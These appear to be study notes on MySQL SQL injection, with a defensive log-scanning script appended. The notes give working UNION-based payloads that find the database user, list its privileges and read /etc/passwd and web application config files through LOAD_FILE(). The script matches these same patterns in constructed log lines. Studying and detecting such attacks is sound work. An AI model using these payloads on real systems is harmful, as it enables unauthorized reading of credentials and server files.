
Reading Files

  • If we are a privileged user and have the FILE privilege, we can read files.
  • Users with database administrator (DBA) privileges are usually allowed to read data.

Find User:

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
  • Incorporating it in our UNION queries:
    • IN' UNION SELECT 1, user(), 3, 4#
    • IN' UNION SELECT 1, user, 3, 4 from mysql.user#
  • This means we are the root user for the DBMS

Find User privileges:

SELECT super_priv FROM mysql.user 
SELECT super_priv FROM mysql.user WHERE user="root"
  • IN' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user#
    • Y suggests we have superuser privileges

List privileges given to our user:

  • IN' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"#
  • We want to use the FILE privilege

LOAD_FILE()

  • IN' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4#
  • IN' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4#

    • This renders the same page in the response, but the page source now includes the whole file, which references a config.php file that is worth a look.
  • IN' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4#
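
From the defender's side, requests carrying the statements in these notes stand out in web server logs. The following is an added example, not part of the original notes: it URL-decodes query parameter values and flags the UNION, user-lookup, privilege-enumeration and LOAD_FILE() patterns listed above. The log lines are constructed, and the port_code parameter name is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures derived from the statements in these notes.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "user_func": re.compile(r"\b(?:current_)?user\s*\(\s*\)", re.I),
    "priv_enum": re.compile(
        r"\b(?:mysql\.user|super_priv|information_schema\.user_privileges)\b",
        re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
}

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the port_code parameter is hypothetical.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /search.php?port_code=IN HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /search.php?port_code=IN%27+UNION+SELECT+1%2C+user%28%29%2C+3%2C+4%23 HTTP/1.1" 200 530',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /search.php?port_code=IN%27+UNION+SELECT+1%2C+LOAD_FILE%28%22%2Fetc%2Fpasswd%22%29%2C+3%2C+4%23 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /search.php?port_code=IN%27+UNION+SELECT+1%2C+super_priv%2C+3%2C+4+FROM+mysql.user%23 HTTP/1.1" 200 540',
]


def scan_line(line):
    """Return the sorted rule names matched by any query parameter value."""
    match = REQUEST.search(line)
    if not match:
        return []
    hits = set()
    query = urlsplit(match.group(1)).query
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for _name, value in parse_qsl(query, keep_blank_values=True):
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    return sorted(hits)


def scan(lines):
    """Map line index -> matched rules, skipping clean lines."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

A load_file hit on a web-facing parameter is the highest-priority signal here, since it only succeeds when the application's database account holds the FILE privilege.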